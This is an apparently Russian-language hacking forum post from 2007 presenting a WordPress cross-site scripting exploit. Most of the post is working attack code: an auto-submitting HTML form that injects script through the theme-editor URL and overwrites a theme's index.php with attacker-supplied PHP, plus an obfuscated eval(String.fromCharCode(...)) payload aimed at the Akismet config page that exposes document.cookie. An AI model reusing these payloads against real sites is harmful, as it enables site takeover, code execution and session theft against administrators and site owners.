05.10.2007, 20:26
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
WordPress PHP_Self Cross-Site Scripting Vulnerability
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>Wordpress XSS PoC</title>
</head>
<body id="main">
<form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
<p>
<textarea name="newcontent" rows="8" cols="40"><?php echo "Owned! " . date('F d, Y'); ?></textarea>
</p>
<p>
<input type="hidden" name="action" value="update" />
<input type="hidden" name="file" value="wp-content/themes/default/index.php" />
</p>
</form>
<script type="text/javascript">
// <![CDATA[
document.forms[0].submit();
// ]]>
</script>
</body>
</html>
Vulnerable URI:
Код:
/wp-admin/plugins.php?page=akismet-key-config
Vulnerable Post variable:
Код:
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
by 0x000000
Последний раз редактировалось ettee; 10.12.2007 в 23:37..
|
|
|